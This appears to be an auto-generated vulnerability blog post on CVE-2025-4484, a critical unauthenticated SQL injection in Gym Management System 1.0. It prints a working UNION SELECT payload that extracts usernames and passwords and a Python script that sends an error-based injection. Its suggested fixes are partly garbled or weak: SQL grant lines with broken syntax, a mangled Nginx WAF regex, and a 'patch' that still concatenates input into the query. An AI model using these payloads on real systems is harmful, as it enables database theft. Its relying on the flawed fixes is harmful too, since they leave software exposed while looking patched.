Gym Management System, SQL Injection, CVE-2025-4484 (Critical)

Listen to this Post

How CVE-2025-4484 Works

This critical SQL injection vulnerability exists in Gym Management System 1.0 through the `/ajax.php?action=delete_user` endpoint. The system fails to properly sanitize the `ID` parameter before using it in SQL queries, allowing attackers to inject malicious SQL commands. When crafted SQL payloads are passed via the ID parameter, the backend database executes them with the same privileges as the application. This enables unauthorized data access, modification, or deletion. The vulnerability is remotely exploitable without authentication, making it particularly dangerous as attackers can compromise the entire database.

DailyCVE Form

Platform: Gym Management System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/13/2025

What Undercode Say:

-- Sample Exploit Payload
/ajax.php?action=delete_user&ID=1' UNION SELECT 1,username,password,4 FROM users--
Exploit Script Example
import requests
target = "http://target.com/ajax.php"
params = {
"action": "delete_user",
"ID": "1' AND EXTRACTVALUE(0,CONCAT(0x5c,USER()))--"
}
response = requests.get(target, params=params)
print(response.text)
Detection Command
curl -s "http://target.com/ajax.php?action=delete_user&ID=1'" | grep -i "error|syntax|mysql"
// Protection Patch
$id = mysqli_real_escape_string($conn, $_GET['ID']);
$query = "DELETE FROM users WHERE id = '$id'";
-- Database Hardening
REVOKE ALL PRIVILEGES ON gym_db. FROM 'gym_user'@'%';
GRANT SELECT, INSERT, UPDATE ON gym_db. TO 'gym_user'@'%';
WAF Rule for Nginx
location ~ ajax.php {
if ($args ~ "action=delete_user.ID=.[';]") {
return 403;
}
}
// Input Validation
function validateID(id) {
return /^\d+$/.test(id);
}

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top